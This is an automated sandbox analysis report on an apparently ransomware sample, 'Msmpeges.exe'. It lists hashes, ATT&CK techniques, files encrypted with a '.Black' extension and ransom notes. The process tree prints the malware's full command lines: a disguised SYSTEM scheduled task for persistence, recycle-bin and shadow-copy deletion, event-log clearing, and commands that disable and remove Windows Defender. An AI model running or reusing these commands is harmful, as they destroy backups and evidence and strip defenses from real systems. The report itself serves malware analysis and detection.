eb29fced033ea67608e939b173704b856db3fe680fce51b06c85bb99b25dad9d

Resubmissions

28/07/2023, 02:16

230728-cqg16sah59 9

28/07/2023, 02:05

230728-ch3mxabe91 9

Analysis

max time kernel
275s
max time network
272s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
28/07/2023, 02:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Msmpeges.exe
Size

161KB
MD5

1dde7e42e33b9ed602f9c839cca7150b
SHA1

538a0f38f2745dff05c7f2e05fc1fe3165b7767e
SHA256

edcccd772c68c75f56becea7f54fb7ee677863b6beaca956c52ee20ec23b472d
SHA512

c4d5a9288237a7f06295ea7bbb86b8917b9caba23673421dad6277506771ce87e233bb6894c30802a1cda927c2a3360be49ea2c96c245e9dc5944461e256f2b0
SSDEEP

3072:X2+fD5RiXm5v/ACvkIF/o7t4PX5AvJ+juO4LcVm8:VfD5RiXmh5sIm7t4PyaELcE8

Score

9^/10

ransomware

Malware Config

Signatures

Renames multiple (7759) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation	Msmpeges.exe

Executes dropped EXE 1 IoCs

pid	Process
3652	Diag.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-4176143399-3250363947-192774652-1000\desktop.ini	Msmpeges.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	Msmpeges.exe
File opened (read-only)	\??\K:	Msmpeges.exe
File opened (read-only)	\??\Q:	Msmpeges.exe
File opened (read-only)	\??\R:	Msmpeges.exe
File opened (read-only)	\??\V:	Msmpeges.exe
File opened (read-only)	\??\A:	Msmpeges.exe
File opened (read-only)	\??\B:	Msmpeges.exe
File opened (read-only)	\??\M:	Msmpeges.exe
File opened (read-only)	\??\N:	Msmpeges.exe
File opened (read-only)	\??\D:	Msmpeges.exe
File opened (read-only)	\??\F:	Msmpeges.exe
File opened (read-only)	\??\I:	Msmpeges.exe
File opened (read-only)	\??\L:	Msmpeges.exe
File opened (read-only)	\??\W:	Msmpeges.exe
File opened (read-only)	\??\X:	Msmpeges.exe
File opened (read-only)	\??\Z:	Msmpeges.exe
File opened (read-only)	\??\G:	Msmpeges.exe
File opened (read-only)	\??\O:	Msmpeges.exe
File opened (read-only)	\??\P:	Msmpeges.exe
File opened (read-only)	\??\S:	Msmpeges.exe
File opened (read-only)	\??\T:	Msmpeges.exe
File opened (read-only)	\??\U:	Msmpeges.exe
File opened (read-only)	\??\Y:	Msmpeges.exe
File opened (read-only)	\??\H:	Msmpeges.exe
File opened (read-only)	\??\J:	Msmpeges.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ul-oob.xrm-ms	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ul-phn.xrm-ms	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\ui-strings.js	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\ui-strings.js.Black	Msmpeges.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons_retina.png	Msmpeges.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right-pressed.gif.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\dcf.x-none.msi.16.x-none.boot.tree.dat	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-140.png	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-down_32.svg	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\PlayStore_icon.svg	Msmpeges.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\plugins.dat	Msmpeges.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\PFM\zx______.pfm	Msmpeges.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-pl.xrm-ms.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\as90.xsl	Msmpeges.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-sl\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ppd.xrm-ms	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\plugin.js.Black	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\ui-strings.js	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\ui-strings.js	Msmpeges.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\Black_Recover.txt	Msmpeges.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ach\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\[email protected]	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js.Black	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pt_get.svg	Msmpeges.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\nb-NO\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ppd.xrm-ms.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaTypewriterBold.ttf.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml.Black	Msmpeges.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\sfs_icons.png.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-ul-phn.xrm-ms.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js	Msmpeges.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-100.png.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Gothic.xml	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\file_icons.png	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_OEM_Perp-ul-oob.xrm-ms	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\offsymt.ttf.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar.Black	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\ui-strings.js.Black	Msmpeges.exe
File opened for modification	C:\Program Files\ShowMerge.tiff.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar.Black	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-100.png	Msmpeges.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	Msmpeges.exe
File created	C:\Program Files\Common Files\microsoft shared\VC\Black_Recover.txt	Msmpeges.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	Msmpeges.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.Black	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\ui-strings.js	Msmpeges.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-fr\ui-strings.js	Msmpeges.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\pl\Black_Recover.txt	Msmpeges.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4204	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
784	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4596	powershell.exe
2440	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
2440	powershell.exe
2440	powershell.exe
4596	powershell.exe
4596	powershell.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe
2324	Msmpeges.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2324	Msmpeges.exe
Token: SeRestorePrivilege	2324	Msmpeges.exe
Token: SeBackupPrivilege	2324	Msmpeges.exe
Token: SeTakeOwnershipPrivilege	2324	Msmpeges.exe
Token: SeAuditPrivilege	2324	Msmpeges.exe
Token: SeSecurityPrivilege	2324	Msmpeges.exe
Token: SeIncBasePriorityPrivilege	2324	Msmpeges.exe
Token: SeBackupPrivilege	4544	vssvc.exe
Token: SeRestorePrivilege	4544	vssvc.exe
Token: SeAuditPrivilege	4544	vssvc.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
5348	StartMenuExperienceHost.exe
4624	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2324 wrote to memory of 2004	2324	Msmpeges.exe	88
PID 2324 wrote to memory of 2004	2324	Msmpeges.exe	88
PID 2324 wrote to memory of 2004	2324	Msmpeges.exe	88
PID 2324 wrote to memory of 4072	2324	Msmpeges.exe	90
PID 2324 wrote to memory of 4072	2324	Msmpeges.exe	90
PID 2324 wrote to memory of 4072	2324	Msmpeges.exe	90
PID 2324 wrote to memory of 2368	2324	Msmpeges.exe	93
PID 2324 wrote to memory of 2368	2324	Msmpeges.exe	93
PID 2324 wrote to memory of 2368	2324	Msmpeges.exe	93
PID 2324 wrote to memory of 2336	2324	Msmpeges.exe	94
PID 2324 wrote to memory of 2336	2324	Msmpeges.exe	94
PID 2324 wrote to memory of 2336	2324	Msmpeges.exe	94
PID 2324 wrote to memory of 1856	2324	Msmpeges.exe	95
PID 2324 wrote to memory of 1856	2324	Msmpeges.exe	95
PID 2324 wrote to memory of 1856	2324	Msmpeges.exe	95
PID 2324 wrote to memory of 2208	2324	Msmpeges.exe	96
PID 2324 wrote to memory of 2208	2324	Msmpeges.exe	96
PID 2324 wrote to memory of 2208	2324	Msmpeges.exe	96
PID 2004 wrote to memory of 4204	2004	cmd.exe	104
PID 2004 wrote to memory of 4204	2004	cmd.exe	104
PID 2004 wrote to memory of 4204	2004	cmd.exe	104
PID 2324 wrote to memory of 2676	2324	Msmpeges.exe	100
PID 2324 wrote to memory of 2676	2324	Msmpeges.exe	100
PID 2324 wrote to memory of 2676	2324	Msmpeges.exe	100
PID 2324 wrote to memory of 2796	2324	Msmpeges.exe	103
PID 2324 wrote to memory of 2796	2324	Msmpeges.exe	103
PID 2324 wrote to memory of 2796	2324	Msmpeges.exe	103
PID 2324 wrote to memory of 1424	2324	Msmpeges.exe	102
PID 2324 wrote to memory of 1424	2324	Msmpeges.exe	102
PID 2324 wrote to memory of 1424	2324	Msmpeges.exe	102
PID 2796 wrote to memory of 4596	2796	cmd.exe	107
PID 2796 wrote to memory of 4596	2796	cmd.exe	107
PID 2796 wrote to memory of 4596	2796	cmd.exe	107
PID 1424 wrote to memory of 1376	1424	cmd.exe	109
PID 1424 wrote to memory of 1376	1424	cmd.exe	109
PID 1424 wrote to memory of 1376	1424	cmd.exe	109
PID 2336 wrote to memory of 2440	2336	cmd.exe	110
PID 2336 wrote to memory of 2440	2336	cmd.exe	110
PID 2336 wrote to memory of 2440	2336	cmd.exe	110
PID 2676 wrote to memory of 4308	2676	cmd.exe	111
PID 2676 wrote to memory of 4308	2676	cmd.exe	111
PID 2676 wrote to memory of 4308	2676	cmd.exe	111
PID 2324 wrote to memory of 2116	2324	Msmpeges.exe	136
PID 2324 wrote to memory of 2116	2324	Msmpeges.exe	136
PID 2324 wrote to memory of 2116	2324	Msmpeges.exe	136
PID 2324 wrote to memory of 4440	2324	Msmpeges.exe	138
PID 2324 wrote to memory of 4440	2324	Msmpeges.exe	138
PID 2324 wrote to memory of 4440	2324	Msmpeges.exe	138
PID 2324 wrote to memory of 1124	2324	Msmpeges.exe	140
PID 2324 wrote to memory of 1124	2324	Msmpeges.exe	140
PID 2324 wrote to memory of 1124	2324	Msmpeges.exe	140
PID 2324 wrote to memory of 1476	2324	Msmpeges.exe	142
PID 2324 wrote to memory of 1476	2324	Msmpeges.exe	142
PID 2324 wrote to memory of 1476	2324	Msmpeges.exe	142
PID 2324 wrote to memory of 624	2324	Msmpeges.exe	143
PID 2324 wrote to memory of 624	2324	Msmpeges.exe	143
PID 2324 wrote to memory of 624	2324	Msmpeges.exe	143
PID 2324 wrote to memory of 3836	2324	Msmpeges.exe	146
PID 2324 wrote to memory of 3836	2324	Msmpeges.exe	146
PID 2324 wrote to memory of 3836	2324	Msmpeges.exe	146
PID 2324 wrote to memory of 5504	2324	Msmpeges.exe	149
PID 2324 wrote to memory of 5504	2324	Msmpeges.exe	149
PID 2324 wrote to memory of 5504	2324	Msmpeges.exe	149
PID 1124 wrote to memory of 4836	1124	cmd.exe	148

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe
"C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"
1⤵
- Checks computer location settings
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Update BETA" /TR "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Update BETA" /TR "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:4204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q P:\$RECYCLE.BIN,Q:\$RECYCLE.BIN,R:\$RECYCLE.BIN,S:\$RECYCLE.BIN,T:\$RECYCLE.BIN,U:\$RECYCLE.BIN,V:\$RECYCLE.BIN,W:\$RECYCLE.BIN,X:\$RECYCLE.BIN,F:\$RECYCLE.BIN,G:\$RECYCLE.BIN,K:\$RECYCLE.BIN,L:\$RECYCLE.BIN,M:\$RECYCLE.BIN,N:\$RECYCLE.BIN,O:\$RECYCLE.BIN,Y:\$RECYCLE.BIN,Z:\$RECYCLE.BIN,A:\$RECYCLE.BIN,B:\$RECYCLE.BIN,C:\$RECYCLE.BIN,D:\$RECYCLE.BIN,E:\$RECYCLE.BIN,H:\$RECYCLE.BIN,I:\$RECYCLE.BIN,J:\$RECYCLE.BIN
  2⤵
  PID:4072
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q P:\Recycler,Q:\Recycler,R:\Recycler,S:\Recycler,T:\Recycler,U:\Recycler,V:\Recycler,W:\Recycler,X:\Recycler,F:\Recycler,G:\Recycler,K:\Recycler,L:\Recycler,M:\Recycler,N:\Recycler,O:\Recycler,Y:\Recycler,Z:\Recycler,A:\Recycler,B:\Recycler,C:\Recycler,D:\Recycler,E:\Recycler,H:\Recycler,I:\Recycler,J:\Recycler
  2⤵
  PID:2368
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c FOR / F "delims=" %I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%I")
  2⤵
  PID:1856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet&&wbadmin delete catalog -quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
  2⤵
  PID:2208
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4308
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend | Stop-Service -PassThru | Set-Service -StartupType Disabled&&powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend
    3⤵
    PID:1376
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender&&powershell -inputformat none -outputformat none -NonInteractive -Command Windows-Defender-GUI&&powershell -inputformat none -outputformat none -NonInteractive -Command New-ItemProperty -Path "HKLM:SOFTWAREPoliciesMicrosoftWindows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4596
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q P:\$RECYCLE.BIN,Q:\$RECYCLE.BIN,R:\$RECYCLE.BIN,S:\$RECYCLE.BIN,T:\$RECYCLE.BIN,U:\$RECYCLE.BIN,V:\$RECYCLE.BIN,W:\$RECYCLE.BIN,X:\$RECYCLE.BIN,F:\$RECYCLE.BIN,G:\$RECYCLE.BIN,K:\$RECYCLE.BIN,L:\$RECYCLE.BIN,M:\$RECYCLE.BIN,N:\$RECYCLE.BIN,O:\$RECYCLE.BIN,Y:\$RECYCLE.BIN,Z:\$RECYCLE.BIN,A:\$RECYCLE.BIN,B:\$RECYCLE.BIN,C:\$RECYCLE.BIN,D:\$RECYCLE.BIN,E:\$RECYCLE.BIN,H:\$RECYCLE.BIN,I:\$RECYCLE.BIN,J:\$RECYCLE.BIN
  2⤵
  PID:2116
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rd /s /q P:\Recycler,Q:\Recycler,R:\Recycler,S:\Recycler,T:\Recycler,U:\Recycler,V:\Recycler,W:\Recycler,X:\Recycler,F:\Recycler,G:\Recycler,K:\Recycler,L:\Recycler,M:\Recycler,N:\Recycler,O:\Recycler,Y:\Recycler,Z:\Recycler,A:\Recycler,B:\Recycler,C:\Recycler,D:\Recycler,E:\Recycler,H:\Recycler,I:\Recycler,J:\Recycler
  2⤵
  PID:4440
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Remove -Item 'd:\$RECYCLE.BIN','c:\$RECYCLE.BIN' -Recurse -Force
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4836
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c FOR / F "delims=" %I IN ('WEVTUTIL EL') DO (WEVTUTIL CL "%I")
  2⤵
  PID:1476
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet&&wbadmin delete catalog -quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE
  2⤵
  PID:624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"
  2⤵
  PID:3836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%s"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3528
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender&&powershell -inputformat none -outputformat none -NonInteractive -Command Windows-Defender-GUI&&powershell -inputformat none -outputformat none -NonInteractive -Command New-ItemProperty -Path "HKLM:SOFTWAREPoliciesMicrosoftWindows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
  2⤵
  PID:5504
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Remove-WindowsFeature Windows-Defender
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2276
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend | Stop-Service -PassThru | Set-Service -StartupType Disabled&&powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2200
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Get-Service WinDefend
    3⤵
    PID:2832
- C:\Windows\SysWOW64\cmd.exe
